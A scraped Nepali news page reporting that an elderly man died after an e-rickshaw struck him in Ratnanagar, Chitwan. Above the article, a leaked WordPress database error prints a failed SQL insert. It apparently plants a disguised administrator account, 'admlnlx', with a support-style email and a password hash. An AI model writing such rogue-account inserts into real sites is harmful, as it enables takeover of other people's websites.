WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEYov7GN9tmFoVOHAGzWp5TO10Op9N1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 17:15:44', '', 'admlnlx', 'admlnlx')
चितवन,पुस ९-
पूर्वी चितवनको रत्ननगरमा इ–रिक्साको ठक्करबाट घाइते भएका एक वृद्धको गएराति मृत्यु भएको छ।
रत्ननगर नगरपालिका–१ भक्तिनी बगैँचा नजिक ना १ ह ५१८५ नंको इ–रिक्साले खैरहनी नगरपालिका–१ ज्यामिरेका ६५ वर्षीय हिरालाल विकलाई ठक्कर दिएको थियो। विकको उपचारका क्रममा गएराति १२ बजे कलेज अफ मेडिकल साइसेन्स भरतपुरमा मृत्यु भएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ।
इ–रिक्सा र चालकलाई इलाका प्रहरी कार्यालय टाँडीले नियन्त्रणमा लिएको छ।